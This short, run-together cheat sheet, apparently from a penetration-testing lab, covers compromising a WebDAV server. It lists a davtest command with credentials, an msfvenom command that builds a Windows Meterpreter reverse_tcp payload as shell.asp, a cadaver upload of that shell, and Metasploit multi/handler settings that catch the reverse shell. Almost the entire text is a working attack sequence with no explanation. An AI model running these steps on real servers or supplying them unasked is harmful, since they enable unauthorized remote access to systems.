msfvenom,metasploit
davtest -auth username:password -url http://ip address/webdavMsfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(your ip) LPORT=1234 -f asp > shell.aspcadaver http://10.4.18.218/webdavput /root/shell.aspservice postgresql start && msfconsoleuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.80.4
set LPORT 1234
run
Metasploit - automatic
Last updated